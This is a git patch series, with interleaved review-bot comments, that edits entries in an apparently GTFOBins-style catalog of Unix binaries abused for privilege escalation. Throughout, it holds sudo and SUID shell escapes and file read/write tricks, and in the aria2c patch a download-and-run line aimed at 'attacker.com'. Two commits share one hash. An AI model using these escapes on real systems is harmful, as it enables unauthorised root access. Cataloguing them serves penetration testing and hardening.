From db40142ea7429b630d31469369653eb66da12ccc Mon Sep 17 00:00:00 2001
From: Shikata
Date: Mon, 11 Jan 2021 12:31:54 +0200
Subject: [PATCH 01/20] Remove redundant sudo from SUID category
---
 _gtfobins/nohup.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/_gtfobins/nohup.md b/_gtfobins/nohup.md
index 6c75a80..2024e07 100644
--- a/_gtfobins/nohup.md
+++ b/_gtfobins/nohup.md
@@ -8,7 +8,7 @@ functions:
 nohup "$COMMAND"
 cat nohup.out
 sudo:
- - code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
+ - code: nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
 suid:
 - code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
 ---
From c4f93b87d5d09565213ffd52384d4f2ce1c165ea Mon Sep 17 00:00:00 2001
From: Shikata
Date: Mon, 11 Jan 2021 12:37:37 +0200
Subject: [PATCH 02/20] Remove redundant lua -e from File Write and File Read categories in nmap
---
 _gtfobins/nmap.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md
index ba93dde..6a76161 100644
--- a/_gtfobins/nmap.md
+++ b/_gtfobins/nmap.md
@@ -85,7 +85,7 @@ functions:
 file-write:
 - code: |
 TF=$(mktemp)
- echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
+ echo 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
 nmap --script=$TF
 - description: The payload appears inside the regular nmap output.
 code: |
@@ -94,7 +94,7 @@ functions:
 file-read:
 - code: |
 TF=$(mktemp)
- echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
+ echo 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
 nmap --script=$TF
 sudo:
 - description: Input echo is disabled.
From 9d1b86e9d3f0e37007a99009b29874c4628764c7 Mon Sep 17 00:00:00 2001
From: Shikata
Date: Mon, 11 Jan 2021 12:56:13 +0200
Subject: [PATCH 03/20] Switch SUID to Limited SUID in lwp-request
---
 _gtfobins/lwp-request.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
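Review bot: The hunk of patch 01 edits the `sudo:` entry rather than the `suid:` entry the subject names: the `sudo` prefix is dropped from the line under `sudo:`, while the context line under `suid:` still reads `sudo nohup /bin/sh -p ...`, so after this commit the sudo entry no longer invokes sudo and the SUID entry still does. Patch 07 later in the series moves the two entries back into their correct categories; squashing 01 into 07 would avoid publishing an intermediate revision in which both categories are wrong. The enclosing `functions:` mapping starts before the hunk.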
diff --git a/_gtfobins/lwp-request.md b/_gtfobins/lwp-request.md
index aaa7476..8bf0677 100644
--- a/_gtfobins/lwp-request.md
+++ b/_gtfobins/lwp-request.md
@@ -4,7 +4,7 @@ functions:
 - code: |
 LFILE=file_to_read
 lwp-request "file://$LFILE"
- suid:
+ limited-suid:
 - code: |
 LFILE=file_to_read
 ./lwp-request "file://$LFILE"
From 05a9ae111b4c65891808b3fb3ef47edf56577085 Mon Sep 17 00:00:00 2001
From: Shikata
Date: Mon, 11 Jan 2021 13:02:11 +0200
Subject: [PATCH 04/20] Switch SUID to Limited SUID in hping3
---
 _gtfobins/hping3.md | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/_gtfobins/hping3.md b/_gtfobins/hping3.md
index cd50714..fecff81 100644
--- a/_gtfobins/hping3.md
+++ b/_gtfobins/hping3.md
@@ -4,12 +4,12 @@ functions:
 - code: |
 hping3
 /bin/sh
- suid:
- - code: |
- ./hping3
- /bin/sh
 sudo:
 - code: |
 sudo hping3
 /bin/sh
+ limited-suid:
+ - code: |
+ ./hping3
+ /bin/sh
 ---
From 211edf746b31748113b3eb1ccec8fc78443656c0 Mon Sep 17 00:00:00 2001
From: Shikata
Date: Mon, 11 Jan 2021 13:02:54 +0200
Subject: [PATCH 05/20] Fixed order of Limited SUID category in lwp-request
---
 _gtfobins/lwp-request.md | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/_gtfobins/lwp-request.md b/_gtfobins/lwp-request.md
index 8bf0677..baf0a4b 100644
--- a/_gtfobins/lwp-request.md
+++ b/_gtfobins/lwp-request.md
@@ -4,12 +4,12 @@ functions:
 - code: |
 LFILE=file_to_read
 lwp-request "file://$LFILE"
- limited-suid:
- - code: |
- LFILE=file_to_read
- ./lwp-request "file://$LFILE"
 sudo:
 - code: |
 LFILE=file_to_read
 sudo lwp-request "file://$LFILE"
+ limited-suid:
+ - code: |
+ LFILE=file_to_read
+ ./lwp-request "file://$LFILE"
 ---
From 211edf746b31748113b3eb1ccec8fc78443656c0 Mon Sep 17 00:00:00 2001
From: Shikata
Date: Mon, 11 Jan 2021 13:45:21 +0200
Subject: [PATCH 06/20] Switch SUID to Limited SUID in aria2c
---
 _gtfobins/aria2c.md | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)
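Review bot: In patch 03 the renamed `limited-suid:` key is left in the slot the old `suid:` key occupied, ahead of `sudo:`, whereas every other file touched by this series keeps `limited-suid:` after `sudo:` (the awk, lua and sqlite3 context lines show that order); patch 05 exists only to move it. Patch 04 makes the same rename in hping3 and patch 14 reverts it again, so 03+05 and 04+14+20 would be clearer squashed into single commits. Both hunks sit inside a `functions:` mapping whose start is outside the hunk, and the lwp-request hunk of patch 03 ends before the file does.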
diff --git a/_gtfobins/aria2c.md b/_gtfobins/aria2c.md
index d9fc451..5793b81 100644
--- a/_gtfobins/aria2c.md
+++ b/_gtfobins/aria2c.md
@@ -10,13 +10,6 @@ functions:
 aria2c --on-download-error=$TF http://x
 - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
 code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
- suid:
- - code: |
- COMMAND='id'
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- ./aria2c --on-download-error=$TF http://x
 sudo:
 - code: |
 COMMAND='id'
@@ -24,4 +17,11 @@ functions:
 echo "$COMMAND" > $TF
 chmod +x $TF
 sudo aria2c --on-download-error=$TF http://x
+ limited-suid:
+ - code: |
+ COMMAND='id'
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ ./aria2c --on-download-error=$TF http://x
 ---
From a48303c2b98f2090acd82121007e1218a98d35ec Mon Sep 17 00:00:00 2001
From: Shikata
Date: Mon, 11 Jan 2021 16:18:18 +0200
Subject: [PATCH 07/20] Remove redundant sudo from SUID category in nohup
---
 _gtfobins/nohup.md | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/_gtfobins/nohup.md b/_gtfobins/nohup.md
index 2024e07..ff669c2 100644
--- a/_gtfobins/nohup.md
+++ b/_gtfobins/nohup.md
@@ -7,8 +7,8 @@ functions:
 COMMAND='/usr/bin/id'
 nohup "$COMMAND"
 cat nohup.out
- sudo:
- - code: nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
 suid:
- - code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
+ - code: nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
+ sudo:
+ - code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
 ---
From fd719bb4b6b6d4a74e31c22091910d2dbccce148 Mon Sep 17 00:00:00 2001
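Review bot: The new `suid:` line in patch 07 still spells the binary as plain `nohup`, whereas the SUID entries added or corrected elsewhere in this series (ed, awk, gawk, mawk, nawk) use the `./` form; patch 13 adds it for nohup three commits later. Squashing 13 into this commit, which already rewrites that exact line, keeps the catalog's notation consistent at every revision instead of only at the tip. The `functions:` mapping enclosing the hunk starts before it.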
From: Shikata
Date: Tue, 12 Jan 2021 13:39:52 +0200
Subject: [PATCH 08/20] Add SUID category to awk
---
 _gtfobins/awk.md | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md
index a131e09..6f53813 100644
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@@ -27,6 +27,10 @@ functions:
 - code: |
 LFILE=file_to_read
 awk '//' "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ awk '//' "$LFILE"
 sudo:
 - code: sudo awk 'BEGIN {system("/bin/sh")}'
 limited-suid:
From 47698d0cfbc28d6fed2eb71d51f9f8673d7d1b50 Mon Sep 17 00:00:00 2001
From: Shikata
Date: Tue, 12 Jan 2021 13:44:19 +0200
Subject: [PATCH 09/20] Add SUID [file read] category to ed
---
 _gtfobins/ed.md | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md
index 29735e9..656f7e0 100644
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@@ -17,6 +17,11 @@ functions:
 ed file_to_read
 ,p
 q
+ suid:
+ - code: |
+ ed file_to_read
+ ,p
+ q
 sudo:
 - code: |
 sudo ed
From ae8271292a39072404d67e155cd6028561bb643f Mon Sep 17 00:00:00 2001
From: Shikata
Date: Tue, 12 Jan 2021 13:50:43 +0200
Subject: [PATCH 10/20] Add SUID [file read] category to lua
---
 _gtfobins/lua.md | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/_gtfobins/lua.md b/_gtfobins/lua.md
index 6686bf5..0e634cc 100644
--- a/_gtfobins/lua.md
+++ b/_gtfobins/lua.md
@@ -59,6 +59,8 @@ functions:
 - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
 file-read:
 - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
+ suid:
+ - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
 sudo:
 - code: sudo lua -e 'os.execute("/bin/sh")'
 limited-suid:
From 28cc7ff7dabeed20f666f3d0eac4d9313df714c7 Mon Sep 17 00:00:00 2001
From: Shikata
Date: Tue, 12 Jan 2021 13:57:34 +0200
Subject: [PATCH 11/20] Add SUID [file read] category to sqlite3
---
 _gtfobins/sqlite3.md | 8 ++++++++
 1 file changed, 8 insertions(+)
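Review bot: Each of the `suid:` entries added in patches 08, 09 and 10 is a verbatim copy of the `file-read:` entry immediately above it, with no `./` on the binary; the awk and ed copies are rewritten by patches 16 and 15, and the awk one additionally carries a trailing space on `- code: |` that patch 12 removes, but the lua entry here (and the sqlite3 entry in patch 11) is never revisited in this series. Either apply the same `./` form to lua and sqlite3 or state in the commit message why those two are meant to differ from the other SUID entries. Every hunk sits inside a `functions:` mapping that starts outside it.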
diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md
index 12daa5b..95b0719 100644
--- a/_gtfobins/sqlite3.md
+++ b/_gtfobins/sqlite3.md
@@ -14,6 +14,14 @@ functions:
 .import $LFILE t
 SELECT * FROM t;
 EOF
+ suid:
+ - code: |
+ LFILE=file_to_read
+ sqlite3 << EOF
+ CREATE TABLE t(line TEXT);
+ .import $LFILE t
+ SELECT * FROM t;
+ EOF
 sudo:
 - code: sudo sqlite3 /dev/null '.shell /bin/sh'
 limited-suid:
From 561a5b2c9a89c74cf2d4c03f79dba1191d1887bd Mon Sep 17 00:00:00 2001
From: Shikata
Date: Wed, 13 Jan 2021 11:22:26 +0200
Subject: [PATCH 12/20] Remove trailing space in awk.md line 31
---
 _gtfobins/awk.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md
index 6f53813..743d5bb 100644
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@@ -28,7 +28,7 @@ functions:
 LFILE=file_to_read
 awk '//' "$LFILE"
 suid:
- - code: |
+ - code: |
 LFILE=file_to_read
 awk '//' "$LFILE"
 sudo:
From b43f418ddb9819763e2d73da7e9dda62bd262fed Mon Sep 17 00:00:00 2001
From: Nick Blekherman
Date: Mon, 18 Jan 2021 09:36:35 +0200
Subject: [PATCH 13/20] Add ./ to SUID category in nohup.mp
---
 _gtfobins/nohup.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/_gtfobins/nohup.md b/_gtfobins/nohup.md
index ff669c2..cc1a8cb 100644
--- a/_gtfobins/nohup.md
+++ b/_gtfobins/nohup.md
@@ -8,7 +8,7 @@ functions:
 nohup "$COMMAND"
 cat nohup.out
 suid:
- - code: nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
+ - code: ./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
 sudo:
 - code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
 ---
From 646ea8132e6761087f7f70f47f6cceada97515f6 Mon Sep 17 00:00:00 2001
From: Nick Blekherman
Date: Mon, 18 Jan 2021 09:40:50 +0200
Subject: [PATCH 14/20] Revert limited-suid to suid and add -p in hping3
---
 _gtfobins/hping3.md | 6 +-----
 1 file changed, 1 insertion(+), 5 deletions(-)
diff --git a/_gtfobins/hping3.md b/_gtfobins/hping3.md
index fecff81..a63760c 100644
--- a/_gtfobins/hping3.md
+++ b/_gtfobins/hping3.md
@@ -3,13 +3,9 @@ functions:
 shell:
 - code: |
 hping3
- /bin/sh
+ /bin/sh -p
 sudo:
 - code: |
 sudo hping3
 /bin/sh
- limited-suid:
- - code: |
- ./hping3
- /bin/sh
 ---
From 3065294305ed8f6c452619f9e041b80fc13c2a31 Mon Sep 17 00:00:00 2001
From: Nick Blekherman
Date: Mon, 18 Jan 2021 09:41:36 +0200
Subject: [PATCH 15/20] Add ./ to SUID category in ed.md
---
 _gtfobins/ed.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md
index 656f7e0..b933fa2 100644
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@@ -19,7 +19,7 @@ functions:
 q
 suid:
 - code: |
- ed file_to_read
+ ./ed file_to_read
 ,p
 q
 sudo:
From 085e72a971a7692eb08d78d82f4f781ef6cc7bea Mon Sep 17 00:00:00 2001
From: Nick Blekherman
Date: Mon, 18 Jan 2021 09:44:34 +0200
Subject: [PATCH 16/20] Add ./ to SUID category in awk.md
---
 _gtfobins/awk.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md
index 743d5bb..aed6432 100644
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@@ -30,7 +30,7 @@ functions:
 suid:
 - code: |
 LFILE=file_to_read
- awk '//' "$LFILE"
+ ./awk '//' "$LFILE"
 sudo:
 - code: sudo awk 'BEGIN {system("/bin/sh")}'
 limited-suid:
From 31b69cfeed1a06a535201241af367a9b9c74aaa7 Mon Sep 17 00:00:00 2001
From: Nick Blekherman
Date: Mon, 18 Jan 2021 09:46:51 +0200
Subject: [PATCH 17/20] Add SUID category to gawk as file read
---
 _gtfobins/gawk.md | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/_gtfobins/gawk.md b/_gtfobins/gawk.md
index bf63ca8..dc398a6 100644
--- a/_gtfobins/gawk.md
+++ b/_gtfobins/gawk.md
@@ -27,6 +27,10 @@ functions:
 - code: |
 LFILE=file_to_read
 gawk '//' "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./gawk '//' "$LFILE"
 sudo:
 - code: sudo gawk 'BEGIN {system("/bin/sh")}'
 limited-suid:
From c293ed20f7516f679a0c58e8c963358685a4e6b0 Mon Sep 17 00:00:00 2001
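Review bot: Patch 14's hunk attaches `-p` to the unprivileged `shell:` entry and deletes the `limited-suid:` block outright, so at this revision hping3 has no SUID category at all while its plain shell entry carries a flag that the series otherwise places only under `suid:` (compare the nohup entries, where `-p` appears on the suid line and not on the sudo line). Patch 20 restores the intended layout (`shell:` with `/bin/sh`, a `suid:` entry with `./hping3` and `/bin/sh -p`), so the two commits should be squashed rather than landing a broken intermediate state. The `functions:` mapping enclosing the hunk starts on the line before it.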
From: Nick Blekherman
Date: Mon, 18 Jan 2021 09:48:12 +0200
Subject: [PATCH 18/20] Add SUID category to mawk as file read
---
 _gtfobins/mawk.md | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/_gtfobins/mawk.md b/_gtfobins/mawk.md
index fcaf868..0ff4b49 100644
--- a/_gtfobins/mawk.md
+++ b/_gtfobins/mawk.md
@@ -10,6 +10,10 @@ functions:
 - code: |
 LFILE=file_to_read
 mawk '//' "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./mawk '//' "$LFILE"
 sudo:
 - code: sudo mawk 'BEGIN {system("/bin/sh")}'
 limited-suid:
From d6d3563e5d8646f32e4816cf240804a8b50e23ea Mon Sep 17 00:00:00 2001
From: Nick Blekherman
Date: Mon, 18 Jan 2021 09:49:07 +0200
Subject: [PATCH 19/20] Add SUID category to nawk as file read
---
 _gtfobins/nawk.md | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/_gtfobins/nawk.md b/_gtfobins/nawk.md
index 9dc77fa..8663a76 100644
--- a/_gtfobins/nawk.md
+++ b/_gtfobins/nawk.md
@@ -27,6 +27,10 @@ functions:
 - code: |
 LFILE=file_to_read
 nawk '//' "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./nawk '//' "$LFILE"
 sudo:
 - code: sudo nawk 'BEGIN {system("/bin/sh")}'
 limited-suid:
From c85513d5a66e61855cc48fc036ec5d7a06624ee8 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Mon, 18 Jan 2021 09:19:35 +0100
Subject: [PATCH 20/20] Fix hping3 SUID
---
 _gtfobins/hping3.md | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/_gtfobins/hping3.md b/_gtfobins/hping3.md
index a63760c..f66954f 100644
--- a/_gtfobins/hping3.md
+++ b/_gtfobins/hping3.md
@@ -3,6 +3,10 @@ functions:
 shell:
 - code: |
 hping3
+ /bin/sh
+ suid:
+ - code: |
+ ./hping3
 /bin/sh -p
 sudo:
 - code: |